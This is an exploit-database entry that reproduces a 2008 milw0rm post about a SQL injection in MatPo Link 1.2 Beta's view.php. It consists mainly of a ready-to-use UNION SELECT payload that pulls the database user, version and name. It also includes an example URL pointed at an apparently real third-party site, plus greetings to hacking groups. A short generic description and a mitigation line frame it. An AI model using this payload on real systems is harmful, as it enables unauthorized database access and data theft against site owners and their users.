header-logo
Suggest Exploit
vendor:
Link
by:
ZoRLu
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Link
Affected Version From: 1.2 Beta
Affected Version To: 1.2 Beta
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MatPo Link Version 1.2 Beta Remote Sql inj.

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL queries in the vulnerable parameter and execute arbitrary SQL commands in the back-end database. This can be used to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Developers should also use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

[~] MatPo Link Version 1.2 Beta Remote Sql inj.
[~]
[~] view.php (id)
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/view.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

example:

http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-03]